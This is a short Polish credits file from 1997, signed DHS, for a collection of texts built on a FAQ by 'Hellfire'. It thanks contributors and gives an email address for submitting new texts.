Hellfire - Te texty powstaly na podstawie jego FAQ, ktore bylo "szkieletem"
do tego wszytskiego, oczywiescie za jego zgoda:)
Dlatego nie dziwcie sie ze narazie wiekszosc textow jest jego autorstwa...
(drugi glowny odpowiedzialny za skladanie tego wszystkiego do kupy)

AnGel
Nemes- to ten Provider, dzieki za oswiecenie paru spraw

Jesli napisales jakies txty, ktore chcialbys tu zamiescic, to wyslij je na adres
grzywacz@ptk.krakow.pl
jesli beda ok, to zastana tutaj zamieszczone;)

Copyright 1997 by DHS
EOF